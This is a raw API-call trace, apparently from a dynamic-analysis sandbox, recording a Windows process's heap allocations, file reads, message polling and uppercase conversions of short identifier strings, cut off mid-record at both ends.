0x2aaa570 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e8020 [0208.909] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.909] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xe0a8, lpOverlapped=0x0) returned 1 [0208.912] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe0a8) returned 0x2aae878 [0208.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e8020 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe0a8) returned 0x2abc928 [0208.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe0a8) returned 0x2aae878 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0208.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0208.918] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0208.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe0a8) returned 0x2aae878 [0208.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0208.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe0a8) returned 0x2aca9d8 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0208.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0208.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.921] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0208.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0208.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.925] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0208.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0208.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0208.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.926] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.926] HeapFree 